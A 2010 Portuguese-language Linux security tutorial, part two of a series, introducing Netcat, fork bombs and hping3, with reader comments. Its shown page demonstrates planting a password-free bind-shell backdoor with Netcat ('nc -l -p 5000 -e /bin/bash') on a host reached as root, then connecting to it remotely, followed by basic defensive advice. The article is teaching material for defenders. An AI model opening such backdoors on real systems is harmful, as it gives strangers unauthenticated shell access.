Segurança em seu Linux (parte 2)

Continuação do primeiro artigo sobre segurança em seu Linux, porém nessa parte será estudado fork bomb, prevenção contra fork bomb e algumas outras técnicas.

[ Hits: 36.443 ]

Por: Leonardo Damasceno em 16/03/2010 | Blog: https://techcraic.wordpress.com


Introdução aos softwares



Bem, este artigo é uma continuação do Segurança em seu Linux, não vamos começar com uma introdução a segurança (já que o primeiro artigo já trata deste assunto) e sim falando sobre os softwares utilizados para fazer os testes e os métodos utilizados para a prevenção do mesmo.

Softwares

Netcat:

O Netcat é uma ferramenta de rede, disponível para sistemas operacionais Unix, GNU/Linux, Microsoft Windows e Macintosh que permite, através de comandos e com sintaxe muito sensível, abrir portas TCP/UDP e HOST. Permite forçar conexões UDP/TCP (útil para realizar rastreamento de portas ou realizar transferências de arquivos bit a bit entre os equipamentos).

Fork Bomb:

É uma forma de ataque para negação de serviço. Ele nada mais é do que um script em bash que cria vários serviços em tão pouco tempo, fazendo com que o seu computador trave em menos de um segundo após digitado o comando.

HPING3:

Essa ferramenta tem por definição ser um gerador de pacotes "free" e também um analisador do protocolo TCP/IP. Iremos utilizar o HPING para enviar pacotes SYN Flood para uma página web.

Utilizando o Netcat

Antes de estudar a prevenção para este comando, vamos primeiro utilizá-lo.

Sintaxe:

# nc -l -p 5000 -e /bin/bash

Explicando os parâmetros:
  • -l: Coloca o Netcat em modo de escuta
  • -p: Diz a porta que será aberta para o "backdoor"
  • -e: Diz ao Netcat o que será executado após a conexão efetuada com sucesso

Então estamos dizendo para o Netcat trabalhar em modo de escuta, abrindo a porta 5000 e executando o /bin/bash, retornando um terminal livre para utilizarmos.

Vamos fazer o teste, supondo que você está conectado por ssh ou irá conectar na máquina 192.168.1.10:

# ssh root@192.168.1.10

Agora que estamos na estação de trabalho de algum usuário qualquer, vamos abrir a porta 5000 utilizando o Netcat e conectar quando quisermos, sem precisar de usuário e senha:

# nc -l -p 5000 -e /bin/bash

Pronto, agora note que de qualquer outra máquina, quando você tentar acessar, não irá pedir usuário nem senha, e você poderá navegar pelo sistema, veja:

# nc 192.168.1.10 5000
cd /home
ls
ricardo
marcelo
suporte

Então, estamos vendo que dentro de /home, existem alguns diretórios.

Em resumo, os comandos utilizados foram:

Abrir a porta: nc -l -p 5000 -e /bin/bash

Acessar o IP com a porta aberta: nc 192.168.1.10 5000

Então, como criar um mecanismo de defesa para isso!?

Bem, como foi mostrado, você precisa ter acesso ao servidor ou máquina para utilizar o Netcat.

A melhor defesa seria uma boa senha para este caso. Como foi mostrado no primeiro artigo dessa série, se alguém tem acesso físico a máquina, é quase impossível impedir que o considerado "hacker" ou "cracker" tenha acesso a máquina.

Então podemos proteger o GNU/Linux colocando uma senha no GRUB. Também devemos avisar aos usuários que senhas PRECISAM ser criadas com 6 dígitos ou mais, misturando números e letras de preferência. Para uma melhor segurança básica, de início está bem.

Caso você seja preocupado como eu, isso não bastaria! É necessário correr atrás de mais algumas soluções, como sniffers frequentes em rede, monitorando vulnerabilidades e verificando as senhas com force brute e uma boa wordlist, assim se existe alguma senha fraca, você pede para que o usuário altere de acordo com a política de senhas da sua empresa.

    Próxima página

Páginas do artigo
   1. Introdução aos softwares
   2. Utilizando Fork Bomb
   3. Utilizando HPING3
Outros artigos deste autor

Qmail: simples e funcional

Segurança em seu Linux

Desmistificando o GNU/Linux

PFSense com Snort

I-Educar no Gnu/Linux

Leitura recomendada

Distribuição CAINE Linux para forense digital: em Live-CD, pendrive, máquina virtual ou direto em seu Ubuntu 10.04

Estrutura do Iptables

Melhorando a segurança de servidores GNU/Linux (Parte 1)

Aprenda a capturar a página inicial de seus usuários

Teste de Intrusão com Metasploit

  
Comentários
[1] Comentário enviado por removido em 26/03/2010 - 15:24h

A montagem do artigo foi ótima. A melhor maneira de nos defendermos de um atual ataque é sabendo como eles funcionam de antemão. Alguns usuários tradicionais talvez achem um absurdo ensinar técnicas de invasão, mas a verdade é que somente aprendendo-as é possível defender-se de forma mais eficiente.

Isso sem contar que a melhor maneira de conscientizar o usuário de que, sim, o Linux, apesar de mais seguro, pode ser invadido se usado inadvertidamente, é demonstrando como isso pode ocorrer. Parabéns pelo artigo, que tem conhecimento e dicas valiosas.

[2] Comentário enviado por removido em 15/01/2012 - 00:15h

Uma coisa eu não entendi, se o ping é direto no servidor porque a regra é usada foi forward é não input?! o.õ

[3] Comentário enviado por removido em 04/07/2015 - 03:28h

Quais valores no limits.conf são bons prá se colocar sendo no caso um simples desktop?
--
http://s.glbimg.com/po/tt/f/original/2011/10/20/a97264_w8.jpg

Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts